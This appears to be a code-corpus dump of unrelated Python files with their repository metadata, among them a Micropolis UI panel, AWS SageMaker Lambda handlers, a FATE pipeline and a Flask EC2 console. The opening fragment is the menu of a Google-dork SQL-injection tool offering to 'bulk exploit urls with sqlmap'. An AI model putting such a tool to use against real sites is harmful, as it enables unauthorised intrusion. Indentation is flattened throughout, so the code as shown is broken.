print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| 46.040419 | 206 | 0.497773 | [
"MIT"
] | ThomasTJdev/python_gdork_sqli | findsqlinj.py | 30,755 | Python |
# micropolisnoticepanel.py
#
# Micropolis, Unix Version. This game was released for the Unix platform
# in or about 1990 and has been modified for inclusion in the One Laptop
# Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If
# you need assistance with this program, you may contact:
# http://wiki.laptop.org/go/Micropolis or email [email protected].
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. You should have received a
# copy of the GNU General Public License along with this program. If
# not, see <http://www.gnu.org/licenses/>.
#
# ADDITIONAL TERMS per GNU GPL Section 7
#
# No trademark or publicity rights are granted. This license does NOT
# give you any right, title or interest in the trademark SimCity or any
# other Electronic Arts trademark. You may not distribute any
# modification of this program using the trademark SimCity or claim any
# affliation or association with Electronic Arts Inc. or its employees.
#
# Any propagation or conveyance of this program must include this
# copyright notice and these terms.
#
# If you convey this program (or any modifications of it) and assume
# contractual liability for the program to recipients of it, you agree
# to indemnify Electronic Arts for any liability that those contractual
# assumptions impose on Electronic Arts.
#
# You may not misrepresent the origins of this program; modified
# versions of the program must be marked as such and not identified as
# the original program.
#
# This disclaimer supplements the one included in the General Public
# License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS
# PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY
# OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF
# SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS
# DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,
# INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,
# FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY
# RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,
# USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST
# INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL
# MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE
# WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE
# CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR
# ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME
# JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED
# WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A
# CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY
# NOT APPLY TO YOU.
########################################################################
# Micropolis Status View
# Don Hopkins
########################################################################
# Import stuff
from gi.repository import Gtk as gtk
import cairo
from gi.repository import Pango as pango
from . import micropolisengine
from . import micropolisview
from . import micropolisnoticeview
from . import micropolisdrawingarea
########################################################################
# MicropolisNoticePanel
class MicropolisNoticePanel(gtk.Frame):
def __init__(
self,
engine=None,
centerOnTileHandler=None,
**args):
gtk.Frame.__init__(
self,
**args)
self.engine = engine
self.mapViewVisible = False
engine.expressInterest(
self,
('gameMode',))
# Views
hpaned1 = gtk.HPaned()
self.hpaned1 = hpaned1
self.add(hpaned1)
self.noticeView = micropolisnoticeview.MicropolisNoticeView(
engine=engine,
setMapViewVisible=self.setMapViewVisible)
hpaned1.pack1(self.noticeView, resize=False, shrink=False)
mapView = micropolisdrawingarea.NoticeMicropolisDrawingArea(
engine=engine,
centerOnTileHandler=centerOnTileHandler)
self.mapView = mapView
mapView.set_size_request(150, -1)
mapView.visible = False
hpaned1.pack2(mapView, resize=False, shrink=False)
hpaned1.set_position(1000)
def update(self, name, *args):
engine = self.engine
if name == 'gameMode':
self.updateMapViewAdded()
def updateMapViewAdded(self):
engine = self.engine
mapView = self.mapView
if ((engine.gameMode == 'play') and
self.mapViewVisible):
mapView.set_property("visible", True)
mapView.engage()
else:
mapView.set_property("visible", False)
mapView.disengage()
def setMapViewVisible(self, visible, tileX=-1, tileY=-1, sprite=micropolisengine.SPRITE_NOTUSED):
#print "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible
engine = self.engine
mapView = self.mapView
if visible and (tileX >= 0) and (tileY >= 0):
mapView.centerOnTile(tileX, tileY)
mapView.sprite = sprite
self.mapViewVisible = visible
self.updateMapViewAdded()
########################################################################
| 36.110429 | 101 | 0.678899 | [
"MIT"
] | cmoimoro/gym-micropolis-ga | micropolis/MicropolisCore/src/pyMicropolis/micropolisEngine/micropolisnoticepanel.py | 5,886 | Python |
import json
import datetime
import time
import boto3
import os
def train_and_generate_recommendations(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value. For example, this can be a
# numeric value or a string, or it can be a compound value such as
# a JSON structure.
_input_table_name = row[1]
_output_table_name = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
bucket = os.environ['s3_bucket']
prefix = "training-job-" + time.strftime("%Y%m%d%H%M%S")
s3_output_location = 's3://{}/'.format(bucket)
print(s3_output_location)
training_job_name = prefix
TRAINING_IMAGE_ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_training_job(
TrainingJobName=training_job_name,
HyperParameters=dict(input_table_name=_input_table_name, output_table_name=_output_table_name, region=os.environ['region']),
AlgorithmSpecification={
'TrainingImage': TRAINING_IMAGE_ECR_PATH,
'TrainingInputMode': 'File'
},
RoleArn=SAGEMAKER_ROLE_ARN,
OutputDataConfig={
'S3OutputPath': s3_output_location
},
ResourceConfig={
'InstanceType': 'ml.m5.xlarge',
'InstanceCount': 1,
'VolumeSizeInGB': 10
},
StoppingCondition={
'MaxRuntimeInSeconds': 10000
}
)
training_job_arn = response['TrainingJobArn']
print(training_job_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, training_job_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
def deploy_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value.
model_name = row[1]
model_data_url = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': ECR_PATH,
'ModelDataUrl': model_data_url
},
ExecutionRoleArn=SAGEMAKER_ROLE_ARN
)
print(response)
print("now trying to create endpoint config...")
response = client.create_endpoint_config(
EndpointConfigName=model_name,
ProductionVariants=[
{
'VariantName': 'variant-1',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': 'ml.t2.medium'
}
]
)
print(response)
print("now trying to create the endpoint...")
response = client.create_endpoint(
EndpointName=model_name,
EndpointConfigName=model_name
)
endpoint_arn = response['EndpointArn']
print(endpoint_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, endpoint_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
# function that performs real-time prediction
def invoke_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
body = ""
for row in rows:
model_name = row[1]
# extract and transform the user_ids and item_ids posted to csv
body = body + row[2] + "," + row[3] + "\n"
# invoke the SageMaker endpoint
client = boto3.client('sagemaker-runtime')
response = client.invoke_endpoint(
EndpointName=model_name,
Body=body.encode('utf-8'),
ContentType='text/csv'
)
predictions = response["Body"].read().decode('utf-8')
i = 0
array_of_rows_to_return = []
for prediction in iter(predictions.splitlines()):
# Put the returned row number and the returned value into an array.
row_to_return = [i, prediction]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
i = i + 1
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
} | 32.938525 | 136 | 0.603957 | [
"Apache-2.0"
] | Snowflake-Labs/sfguide-recommender-pipeline | sls/handler.py | 8,037 | Python |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component.dataio import DataIO
from pipeline.component.homo_lr import HomoLR
from pipeline.component.reader import Reader
from pipeline.component.scale import FeatureScale
from pipeline.interface.data import Data
from pipeline.utils.tools import load_job_config
from pipeline.runtime.entity import JobParameters
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
pipeline.set_roles(guest=guest, host=host, arbiter=arbiter)
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=host).component_param(table=host_train_data)
# define DataIO components
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense") # start component numbering at 0
scale_0 = FeatureScale(name='scale_0')
param = {
"penalty": "L2",
"optimizer": "sgd",
"tol": 1e-05,
"alpha": 0.01,
"max_iter": 3,
"early_stop": "diff",
"batch_size": 320,
"learning_rate": 0.15,
"decay": 1.0,
"decay_sqrt": True,
"init_param": {
"init_method": "zeros"
},
"encrypt_param": {
"method": None
},
"cv_param": {
"n_splits": 5,
"shuffle": True,
"random_seed": 33,
"need_cv": True
}
}
homo_lr_0 = HomoLR(name='homo_lr_0', **param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
# set data input sources of intersection components
pipeline.add_component(scale_0, data=Data(data=dataio_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=scale_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
job_parameters = JobParameters(backend=backend, work_mode=work_mode)
pipeline.fit(job_parameters)
# query component summary
print(json.dumps(pipeline.get_component("homo_lr_0").get_summary(), indent=4, ensure_ascii=False))
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| 34.565217 | 112 | 0.686289 | [
"Apache-2.0"
] | Alice-6161/FATE | examples/pipeline/homo_logistic_regression/pipeline-homo-lr-cv.py | 3,975 | Python |
from urllib.parse import urlparse
from dotenv import load_dotenv
import requests
import os
import argparse
def shorten_link(token, url):
response = requests.post(
"https://api-ssl.bitly.com/v4/bitlinks",
headers={"Authorization": "Bearer {}".format(token)},
json={"long_url": url})
response.raise_for_status()
return response.json()["link"]
def count_clicks(token, link):
response = requests.get(
"https://api-ssl.bitly.com/v4/bitlinks/{0}{1}/clicks/summary"
.format(link.netloc, link.path),
headers={"Authorization": "Bearer {}".format(token)})
response.raise_for_status()
return response.json()["total_clicks"]
def is_bitlink(token, link):
response = requests.get(
"https://api-ssl.bitly.com/v4/bitlinks/{0}{1}"
.format(link.netloc, link.path),
headers={"Authorization": "Bearer {}".format(token)})
return response.ok
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Программа для сокращения ссылок или "
"подсчёта количества переходов для bitlink")
parser.add_argument("url", help="Введите URL или bitlink")
args = parser.parse_args()
link = args.url
parsed_bitlink = urlparse(link)
load_dotenv()
token = os.environ["BITLY_TOKEN"]
try:
if is_bitlink(token, parsed_bitlink):
clicks_count = count_clicks(token, parsed_bitlink)
print("Количество переходов по вашей ссылке: ", clicks_count)
else:
bitlink = shorten_link(token, link)
print("Сокращенная ссылка: ", bitlink)
except:
print("Вы ввели неправильную ссылку")
| 31.462963 | 73 | 0.646851 | [
"MIT"
] | v-sht/url-shortener | main.py | 1,844 | Python |
from flask import (
Blueprint,
render_template,
g,
Response,
request,
redirect,
url_for,
abort,
)
from flask.helpers import flash
from flask_login import login_required
from saws.blueprints.utils.utils_ec2 import (
get_ec2_info,
get_key_pairs,
download_key_pair,
launch_instance,
stop_instance,
terminate_instance,
describe_instace,
create_tags,
EC2Instance,
)
from saws.blueprints.utils.utils_lambda import get_lambda_info
from saws.forms import CreateInstanceForm
bp = Blueprint('compute', __name__, url_prefix='/compute')
EC2_STATE_MAP = {
'pending': 'secondary',
'running': 'success',
'shutting-down': 'warning',
'terminated': 'danger',
'stopping': 'warning',
'stopped': 'dark'
}
@bp.route('/ec2', methods=['GET'])
@login_required
def ec2():
instances = get_ec2_info(g.user.account)
return render_template('compute/ec2.html', ins=instances, state_map=EC2_STATE_MAP)
@bp.route('/ec2/<id>', methods=['GET'])
@login_required
def instance(id):
instance = describe_instace(g.user.account, id)
if not instance:
abort(404, 'instance not found')
instance_object = EC2Instance(instance)
return render_template('compute/ec2_instance.html', i=instance_object, state_map=EC2_STATE_MAP)
@bp.route('/ec2/<id>/name', methods=['POST'])
@login_required
def instance_name(id):
name = request.form.get('instance_name')
tags = [{'Key': 'Name', 'Value': name}]
create_tags(g.user.account, id, tags)
flash(f'Name changed to {name}', 'success')
return redirect(url_for('compute.instance', id=id))
@bp.route('/ec2/create', methods=['GET', 'POST'])
@login_required
def instance_create():
instance_form = CreateInstanceForm(request.form)
print(request.method)
if request.method == 'POST':
if instance_form.validate():
os = request.form.get('os')
size = request.form.get('size')
key_name = request.form.get('key_pair')
port_22 = request.form.get('port_22')
port_80 = request.form.get('port_80')
print(f'Launching {os} {size} with {port_22} {port_80}')
props = {
'key_name':key_name,
}
# TODO: create sg
launch_instance(g.user.account, props)
flash('Launching instance', 'success')
return redirect(url_for('compute.ec2'))
keys = get_key_pairs(g.user.account)
return render_template('compute/ec2_create.html', keys=keys, form=instance_form)
@bp.route('/ec2/stop/<instance>', methods=['GET'])
@login_required
def instance_stop(instance):
if not instance:
abort(400)
stop_instance(g.user.account, instance)
flash(f'Stopping instance {instance}', 'success')
return redirect(url_for('compute.ec2'))
@bp.route('/ec2/terminate/<instance>', methods=['GET'])
@login_required
def instance_terminate(instance):
if not instance:
abort(400)
terminate_instance(g.user.account, instance)
flash(f'Terminating instance {instance}', 'success')
return redirect(url_for('compute.ec2'))
@bp.route('/ec2/keypair', methods=['GET'])
@login_required
def keypair():
keys = get_key_pairs(g.user.account)
return render_template('compute/ec2_keypair.html', keys=keys)
@bp.route('/ec2/keypair/download/<name>', methods=['GET'])
@login_required
def download_keypair(name):
kp = download_key_pair(g.user.account, name)
return Response(kp['KeyMaterial'], mimetype='application/x-binary')
@bp.route('/functions', methods=['GET'])
@login_required
def functions():
lambdas = get_lambda_info(g.user.account)
return render_template('compute/lambda.html', lambdas=lambdas)
@bp.route('/functions/<id>', methods=['GET'])
@login_required
def single_function(id):
return render_template('compute/lambda.html') | 26.958333 | 99 | 0.674137 | [
"BSD-2-Clause"
] | vlttnv/saws | saws/blueprints/compute.py | 3,882 | Python |
# AutoTransform
# Large scale, component based code modification library
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro>
# @black_format
"""A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change."""
| 37.538462 | 91 | 0.780738 | [
"MIT"
] | nathro/AutoTransform | src/python/autotransform/change/__init__.py | 488 | Python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service_py3 import LinkedService
class AmazonRedshiftLinkedService(LinkedService):
"""Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'server': {'required': True},
'database': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'server': {'key': 'typeProperties.server', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'database': {'key': 'typeProperties.database', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, *, server, database, additional_properties=None, connect_via=None, description: str=None, parameters=None, annotations=None, username=None, password=None, port=None, encrypted_credential=None, **kwargs) -> None:
super(AmazonRedshiftLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations, **kwargs)
self.server = server
self.username = username
self.password = password
self.database = database
self.port = port
self.encrypted_credential = encrypted_credential
self.type = 'AmazonRedshift'
| 48.712644 | 234 | 0.674139 | [
"MIT"
] | James-DBA-Anderson/azure-sdk-for-python | sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/amazon_redshift_linked_service_py3.py | 4,238 | Python |
import os,sys
import numpy as np
import h5py, time, argparse, itertools, datetime
from scipy import ndimage
import torchvision.utils as vutils
# tensorboardX
from tensorboardX import SummaryWriter
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def get_logger(args):
log_name = args.output+'/log'
date = str(datetime.datetime.now()).split(' ')[0]
time = str(datetime.datetime.now()).split(' ')[1].split('.')[0]
log_name += date+'_'+time
logger = open(log_name+'.txt','w') # unbuffered, write instantly
# tensorboardX
writer = SummaryWriter('runs/'+log_name)
return logger, writer
| 24.025 | 68 | 0.627471 | [
"MIT"
] | ygCoconut/pytorch_connectomics | torch_connectomics/io/misc.py | 961 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(0, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, 2], nums)
nums.append(333)
self.assertListEqual([1, 2, 333], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual('peanut', noms[0])
self.assertEqual('jelly', noms[3])
self.assertEqual('jelly', noms[-1])
self.assertEqual('butter', noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['peanut'], noms[0:1])
self.assertEqual(['peanut','butter'], noms[0:2])
self.assertEqual([], noms[2:2])
self.assertEqual(['and','jelly'], noms[2:20])
self.assertEqual([], noms[4:0])
self.assertEqual([], noms[4:100])
self.assertEqual([], noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['and','jelly'], noms[2:])
self.assertEqual(['peanut','butter'], noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
self.assertEqual ([0,1,2,3,4], list(range(5)))
self.assertEqual([5,6,7,8], list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual([5,4], list(range(5, 3, -1)))
self.assertEqual([0,2,4,6], list(range(0, 8, 2)))
self.assertEqual([1,4,7], list(range(1, 8, 3)))
self.assertEqual([5,1,-3], list(range(5, -7, -4)))
self.assertEqual([5,1,-3,-7], list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(['you', 'shall', 'not', 'pass'], knight)
knight.insert(0, 'Arthur')
self.assertEqual(['Arthur','you', 'shall', 'not', 'pass' ], knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual([10, 20, 30, 40, 'last'], stack)
popped_value = stack.pop()
self.assertEqual('last', popped_value)
self.assertEqual([10, 20, 30, 40], stack)
popped_value = stack.pop(1)
self.assertEqual(20, popped_value)
self.assertEqual([10, 30, 40], stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual([1,2,'last'], queue)
popped_value = queue.pop(0)
self.assertEqual(1, popped_value)
self.assertEqual([2,'last'], queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
| 31.463636 | 79 | 0.576712 | [
"MIT"
] | forwardBench/pythonKoans | python3/koans/about_lists.py | 3,461 | Python |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Factoids', True)
class FactoidFormat(registry.TemplatedString):
"""Value must include $value, otherwise the factoid's value would be left
out."""
requiredTemplates = ['value']
Factoids = conf.registerPlugin('Factoids')
conf.registerChannelValue(Factoids, 'learnSeparator',
registry.String('as', """Determines what separator must be used in the
learn command. Defaults to 'as' -- learn <key> as <value>. Users might
feel more comfortable with 'is' or something else, so it's
configurable."""))
conf.registerChannelValue(Factoids, 'showFactoidIfOnlyOneMatch',
registry.Boolean(True, """Determines whether the bot will reply with the
single matching factoid if only one factoid matches when using the search
command."""))
conf.registerChannelValue(Factoids, 'replyWhenInvalidCommand',
registry.Boolean(True, """Determines whether the bot will reply to invalid
commands by searching for a factoid; basically making the whatis
unnecessary when you want all factoids for a given key."""))
conf.registerChannelValue(Factoids, 'format',
FactoidFormat('$key could be $value.', """Determines the format of
the response given when a factoid's value is requested. All the standard
substitutes apply, in addition to "$key" for the factoid's key and "$value"
for the factoid's value."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 51.147059 | 79 | 0.757332 | [
"BSD-3-Clause"
] | DalavanCloud/supybot | plugins/Factoids/config.py | 3,478 | Python |
from seleniumbase import BaseCase
class MyTourClass(BaseCase):
def test_google_tour(self):
self.open('https://google.com/ncr')
self.wait_for_element('input[title="Search"]')
# Create a website tour using the ShepherdJS library with "dark" theme
